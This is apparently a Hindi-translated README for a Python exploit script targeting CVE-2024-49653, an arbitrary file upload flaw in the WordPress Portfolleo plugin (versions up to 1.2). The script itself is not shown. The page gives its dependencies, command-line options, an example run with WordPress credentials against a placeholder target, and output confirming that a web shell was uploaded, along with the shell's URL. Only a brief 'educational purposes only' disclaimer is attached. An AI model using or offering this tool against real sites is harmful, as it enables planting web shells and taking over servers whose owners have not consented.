
WordPress Portfolleo प्लगइन <= 1.2 - मनमानी फ़ाइल अपलोड कमज़ोरी
शीर्षक: WordPress Portfolleo प्लगिन <= 1.2 - मनमाना फ़ाइल अपलोड भेद्यता
विवरण:
James Eggers के Portfolleo पोर्टफोलियो में खतरनाक प्रकार की फ़ाइल के असीमित अपलोड की भेद्यता वेब सर्वर पर एक वेब शेल अपलोड करने की अनुमति देती है। यह समस्या Portfolleo के संस्करण n/a से 1.2 तक प्रभावित करती है।
और जानें:
CVSS स्कोर:
यह स्क्रिप्ट WordPress Portfolleo प्लगिन (संस्करण <= 1.2) में मनमाना फ़ाइल अपलोड भेद्यता का शोषण करके एक वेब शेल अपलोड करती है।
स्क्रिप्ट चलाने के लिए आपके पास निम्नलिखित स्थापित होने चाहिए:
requests लाइब्रेरीbeautifulsoup4 लाइब्रेरीआप आवश्यक लाइब्रेरीज़ को निम्न का उपयोग करके इंस्टॉल कर सकते हैं:
pip install requests beautifulsoup4
स्क्रिप्ट को निम्नलिखित विकल्पों के साथ चलाएँ:
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of the site (e.g. http://target/wordpress)
-U, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
यदि स्क्रिप्ट सफलतापूर्वक चलती है, तो आपको निम्नलिखित आउटपुट दिखाई देना चाहिए:
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट का अवैध गतिविधियों के लिए उपयोग का समर्थन नहीं करता है। इसका जिम्मेदारी से उपयोग करें और केवल उन प्रणालियों पर जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।
द्वारा: Nxploited | Khaled Alenazi